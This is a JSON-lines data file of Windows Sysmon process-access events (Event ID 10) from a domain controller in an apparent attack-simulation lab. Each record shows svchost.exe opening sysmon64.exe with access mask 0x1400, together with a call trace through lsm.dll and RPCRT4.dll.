{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1483,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1484,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1485,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1486,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1487,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1488,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1489,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1490,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
